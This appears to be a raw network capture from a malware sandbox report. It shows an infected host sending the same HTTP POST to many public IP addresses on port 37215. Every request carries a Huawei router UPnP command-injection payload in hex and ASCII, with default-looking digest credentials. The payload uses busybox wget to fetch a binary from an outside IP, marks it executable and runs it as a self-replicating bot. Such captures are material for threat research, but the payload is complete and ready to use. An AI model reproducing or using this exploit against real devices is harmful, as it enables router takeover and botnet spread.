69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  922192.168.2.1333374183.107.101.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394010067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  923192.168.2.136027420.26.108.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394036055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  924192.168.2.133314041.243.255.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394037962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  925192.168.2.1340370197.72.84.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394037962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  926192.168.2.1346602157.160.131.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394085884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  927192.168.2.134687041.251.164.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394085884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  928192.168.2.135006037.249.171.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394105911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  929192.168.2.134061241.93.247.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394114971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  930192.168.2.1342508157.145.114.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.394139051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  931192.168.2.1343670197.251.249.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396162987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  932192.168.2.1349774143.1.68.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396219969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
